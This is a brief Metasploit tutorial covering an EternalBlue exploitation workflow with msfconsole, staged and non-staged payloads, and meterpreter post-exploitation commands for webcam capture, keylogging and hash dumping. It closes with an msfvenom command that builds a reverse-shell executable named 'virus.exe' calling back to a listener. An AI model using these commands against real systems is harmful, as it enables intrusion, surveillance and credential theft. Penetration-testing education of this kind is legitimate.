Metasploit (developed by Rapid7) unifies exploit code, payload generation, and post-exploitation into a single console. Before Metasploit, you had to compile random C code found on forums. Now, you use `msfconsole`.
The Workflow
- Search: `search eternalblue` (Find the exploit for MS17-010).
- Use: `use exploit/windows/smb/ms17_010_eternalblue`.
- Configure: `set RHOSTS 192.168.1.100` (Target IP). `set LHOST 192.168.1.5` (Your IP).
- Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`.
- Exploit: `exploit`.
- Result: `meterpreter >` session opens. You own the machine.
1. Payloads: Staged vs Non-Staged
Non-Staged (windows/shell_reverse_tcp):
Included the entire shellcode in one packet. Reliable, but large (easier for Antivirus to catch).
Staged (windows/shell/reverse_tcp):
Sends a tiny "Stager" first. The Stager connects back and downloads the rest of the malware from memory. Smaller, stealthier.
2. Meterpreter (The Meta-Interpreter)
A shell (`cmd.exe`) is loud and limited.
Meterpreter is a custom DLL injected into the target's memory.
It runs entirely in RAM (Fileless malware).
Commands:
- `webcam_snap`: Takes a photo.
- `keyscan_start`: Starts keylogging.
- `hashdump`: Steals password hashes.
- `migrate`: Moves itself into `explorer.exe` so it persists if the user closes the exploited app.
3. Msfvenom
Need to create a standalone virus file?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o virus.exe
This creates a `.exe` that, when clicked by the victim, connects back to your Metasploit listener.